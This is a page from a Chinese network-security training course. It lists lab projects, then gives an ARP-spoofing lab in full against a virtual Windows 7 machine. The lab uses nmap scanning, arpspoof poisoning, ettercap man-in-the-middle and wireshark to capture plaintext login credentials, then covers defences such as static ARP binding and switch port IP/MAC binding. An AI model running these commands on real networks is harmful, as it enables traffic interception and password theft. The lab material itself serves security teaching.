目录

  • 1 §1 实训项目1 搭建网络安全实训环境
    • 1.1 导入(第1次课)
    • 1.2 §1.1 靶场:虚拟机CentOS7.8(192.168.112.100)
      • 1.2.1 (1)DVWA-master
      • 1.2.2 (2)sqli-labs(第3次课)
      • 1.2.3 (3)sqlmap
      • 1.2.4 (4)login, loginPHP
      • 1.2.5 (5)Firefox, Hackbar
      • 1.2.6 2022.09.07作业1 “未知攻,焉知防”
      • 1.2.7 2022.09.14作业3“拖库—爆库、爆表、爆字段、爆数据”
      • 1.2.8 Q&A-1(作业批改、辅导答疑)
    • 1.3 §1.2 Burp(第2次课)
      • 1.3.1 2022.09.08作业2 “工欲善其事,必先利其器”
      • 1.3.2 Q&A-2(作业批改、辅导答疑)
    • 1.4 §1.3 Python
      • 1.4.1 Python的Anaconda3集成开发环境
    • 1.5 §1.4 Kali
      • 1.5.1 2022.09.15作业4“永恒之蓝漏洞”
    • 1.6 §1.5 Wireshark
    • 1.7 2022.09.15腾讯会议答疑
  • 2 §2 实训项目2 SQL注入
    • 2.1 ■(1)SQL注入联合查询(第3次课)
      • 2.1.1 附件:联合查询SQL注入模板
      • 2.1.2 ■模板
    • 2.2 (2)SQL注入(PDF文档)
      • 2.2.1 ①更新Kali系统中的Firefox浏览器并安装浏览器插件
      • 2.2.2 (2)部署sqli-labs学习环境
      • 2.2.3 (3)sqli-labs使用教学
      • 2.2.4 (4)实战:SQL注入联合查询-获取数据库数据
    • 2.3 ■(3)部署loginPHP网站
      • 2.3.1 ●SQL注入测试
      • 2.3.2 ●创建数据库、部署简单登录网站loginPHP、进行SQL注入测试(2019.12.17)
      • 2.3.3 ①login.php
      • 2.3.4 ②loginAuth.php
      • 2.3.5 ③loginAuth1.php
      • 2.3.6 ④success.php
      • 2.3.7 ⑤failure.php
      • 2.3.8 ■⑥(loginPHP网站SQL注入)结果截图
    • 2.4 (4)DVWA的SQL Injection
    • 2.5 (5)拓展视野:靶场SQL注入
  • 3 §3 实训项目3 通过SQLmap进行SQL注入并获得后台管理员账号和密码
    • 3.1 (1)安装DVWA
    • 3.2 (2)安装SQLmap
    • 3.3 (3)※实战 SQLmap探测DVWA的SQL注入漏洞
    • 3.4 (4)结果截图(SQLmap拖库)
    • 3.5 (5)使用BurpSuite进行POST方式的SQL注入
    • 3.6 ■附 安装DVWA-1.9(完整版)
  • 4 §4 实训项目4 使用永恒之蓝漏洞对Win7进行渗透
    • 4.1 (1)获取Win7系统shell、开启远程桌面
    • 4.2 (2)截图
    • 4.3 (3)Metasploit渗透测试
    • 4.4 (4)使用msf渗透攻击XP并进行远程关机
  • 5 §5 实训项目5 安装Kali渗透测试系统
    • 5.1 BT到Kali的发展史
    • 5.2 (1)安装Kali
    • 5.3 (2)安装BT5
    • 5.4 ■附 安装Kali、BT5、DVWA、SQLmap、Win7
  • 6 §6 实训项目6 配置Kali渗透测试系统
    • 6.1 (1)安装Kali渗透测试系统
    • 6.2 (2)SSH连接Kali
    • 6.3 (3)※ettercap抓取FTP登录账号和密码
    • 6.4 (4)结果截图(ettercap抓取FTP登录账号和密码)
  • 7 §7 实训项目7 ARP协议安全攻防
    • 7.1 (1)ARP协议安全攻防(试题)
    • 7.2 (2)※ARP协议安全攻防
    • 7.3 (4)实训 防御密码嗅探-使用arpspoof实施中间人攻击并抓取密码
    • 7.4 (3)练习:防御密码嗅探-使用arpspoof实施中间人攻击并抓取密码
    • 7.5 演示视频 arpsproof+etthercap实施中间人攻击
  • 8 §8 实训项目8 暴力破解
    • 8.1 (1)※实战-通过暴力破解Web登录界面获得管理员权限
    • 8.2 (2)字典工具pydictor.py
    • 8.3 (3)hydra和xhydra
    • 8.4 (4)Medusa
    • 8.5 (5)离线破解md5值和shadow加密文件
    • 8.6 (6)Brute Force(DVWA)
    • 8.7 (7)Burp Suite(Windows)
    • 8.8 (8)Burp Suite(Kali)
  • 9 §9 实训项目9 防止黑客攻破Discuz论坛并拿下数据库
    • 9.1 (1)防止黑客攻破Discuz论坛并拿下数据库
    • 9.2 (2)CentOS6.5-desktop及MySQL
  • 10 §10 实训项目10作业 Wireshark抓取Telnet明文包
    • 10.1 (1)※Wireshark抓取Telnet明文包(CentOS6.5)
    • 10.2 (2)结果截图(Wireshark抓取Telnet明文包)
    • 10.3 (3)常用协议分析(ARP、ICMP、TCP、HTTP、DNS)
  • 11 §11 实训项目11 基于文件上传漏洞获得网站shell权限
    • 11.1 ●文件上传(PDF文档)
    • 11.2 (1)基于文件上传漏洞获得网站shell权限
    • 11.3 (2)本地文件包含漏洞截图
    • 11.4 (3)课程资料
    • 11.5 (4)课外 编辑器KindEditor文件上传漏洞
  • 12 §12 实训项目12 Nmap
    • 12.1 (1)安全工具
    • 12.2 (2)Nmap
    • 12.3 (3)网络空间安全(系统渗透测试篇)
    • 12.4 (4)信息收集
  • 13 §13 实训项目13 File Inclusion文件包含漏洞及防御
    • 13.1 (1)本地文件包含
    • 13.2 (2)远程文件包含
  • 14 §14 实训项目14 XSS跨站脚本攻击
    • 14.1 (1)窃取用户Cookie信息保存到远程服务器
    • 14.2 (2)反射型XSS攻击劫持用户浏览器
    • 14.3 (3)存储型XSS窃取用户信息
  • 15 §15 实训项目15 缓冲区溢出漏洞
  • 16 §16 实训项目16 搭建蜜罐系统捕捉黑客操作步骤
  • 17 考核
    • 17.1 平时成绩(40%+30%)
    • 17.2 期末考试(30%)
  • 18 网络1901-04期末考试(2020-2021-2)
    • 18.1 试题1:damicms
    • 18.2 试题2:sqli-labs
    • 18.3 试题3:dvwa
    • 18.4 试题4:loginPHP
  • 19 校外卷重修-B05123网络安全运行与维护复习
    • 19.1 (1)loginPHP
    • 19.2 (2)Python编程
(2)※ARP协议安全攻防

ARP协议安全攻防

【参见公开试题1“系统安全攻防及运维安全管控部分(200分)”部分之任务3:ARP协议安全攻防】


一、设备

1.PC机

  Windows 10

  VMware Workstation 12 Pro

  虚拟机Windows 7

  虚拟机Kali1.09

2.无线路由器(能访问Internet)


二、环境

1.目标机

  虚拟机Windows 7 64x(64位旗舰版)

  IP:192.168.0.209 MAC:00-0C-29-78-AD-F9

  IE浏览器

2.攻击机

  虚拟机Kali1.09

  ip:192.168.0.201 mac:00:0c:29:25:37:8e

  nmap,arpspoof,ettercap,driftnet,wireshark

3.无线路由器

  网关

  IP:192.168.0.1 MAC:b4-0f-3b-99-b1-aa

4.虚拟机Kali Linux所用工具

  nmap

  arpspoof

  ettercap

  driftnet(可选)

  wireshark

5.Windows所用工具

  命令提示符

  arp -a

  arp -s

  arp -d

  ipconfig /all

  ping


三、任务内容

1.获取目标机Win 7虚拟机的IP和MAC地址

C:UsersAdministrator>ipconfig /all

物理地址(MAC地址):00-0C-29-78-AD-F9

IPv4地址:192.168.0.209(首选)

子网掩码:255.255.255.0

默认网关:192.168.0.1

DNS服务器:192.168.0.1


2.获取攻击机Kali虚拟机的ip和mac地址

root@kali:~# ifconfig

eth0      Link encap:Ethernet  HWaddr 00:0c:29:25:37:8e  

          inet addr:192.168.0.201  Bcast:192.168.0.255  Mask:255.255.255.0

......


3.nmap扫描

root@kali:~# nmap -sP 192.168.0.0/24

//扫描本网段192.168.0.0/24,获取目标机的IP:192.168.0.209和MAC:00-0C-29-78-AD-F9

root@kali:~# nmap -O 192.168.0.209

//获取目标机的操作系统信息


4.断网测试

root@kali:~# arpspoof -h

Usage: arpspoof [-i interface] [-t target] host

root@kali:~# arpspoof -i 网卡 -t 目标ip 网关


root@kali:~# arpspoof -i eth0 -t 192.168.0.209 192.168.0.1

原来的Windows 7虚拟机可以上网,现在不能了

Ctrl+Z停止


5.毒化

(1)开启ip流量转发

root@kali:~# echo 1 >> /proc/sys/net/ipv4/ip_forward

root@kali:~# cat /proc/sys/net/ipv4/ip_forward

1


(2)ARP欺骗攻击

数据重定向,使网关的数据重定向到攻击者的机器,流量由网关到攻击者再到受攻击者)

使用arpspoof/ettercap,选一个进行arp欺骗,获取从192.168.0.1(网关)到192.168.0.209(目标机)的流量

root@kali:~# arpspoof -i eth0 -t 192.168.0.1 192.168.0.209


(3)打开另一个终端,进行ARP中间人渗透测试

root@kali:~# ettercap -T -q -M ARP /192.168.0.209// ///

root@kali:~# ettercap -Tq -i eth0


6.打开另一个终端,使用driftnet进行流量监控,显示图片,见图“2.ARP协议安全攻防1.png”

root@kali:~# driftnet -i eth0

//在目标机上用IE浏览器通过无线路由器访问外网(本实例访问http://www.wgxy.net),浏览有图片的网页


7.打开另一个终端,使用wireshark进行抓包,获取用户名和密码

root@kali:~# wireshark

//过滤规则:ip.src == 192.168.0.209 && http

//在目标机上用IE浏览器访问HTTP登录页面(用户名、密码)

//分析包中的用户名和密码(明文),见图“2.ARP协议安全攻防2.png”


8.ARP欺骗的防护

(1)静态绑定 

  最常用的方法就是做IP和MAC静态绑定,在网内把主机和网关都做IP和MAC绑定。

  arp -s <IP地址> <MAC地址>

(2)使用ARP防护软件 

  目前关于ARP类的防护软件比较多,使用比较常用的ARP工具主要是欣向ARP工具、Antiarp等

(3)AM

  在神州数码交换机上配置AM,阻止kali虚拟机发起ARPSpoofing渗透测试

  基本配置如下:

  #全局打开AM功能

  Switch(config)#am enable

  #端口 1/1开启AM功能,绑定IP、MAC

  Switch(config)#interface ethernet 1/1 

  Switch(config-If-Ethernet 1/1)#am port 

  Switch(config-If-Ethernet 1/1)#am mac-ip-pool 00-0C-29-78-AD-F9 192.168.0.209

【参见】

1.“DCN交换机简明配置手册v2.1.chm”中的“7.端口功能配置→2.端口扩展功能配置→01.端口IP、MAC绑定功能”】

2.https://wenku.baidu.com/view/055f0b07e87101f69e31951e.html

AM功能:AM(Access Management)访问管理,它利用收到数据报文的信息(源IP地址或源IP地址+MAC地址)与配置硬件地址池(AM pool)相比较,如果找到则转发,否则丢弃。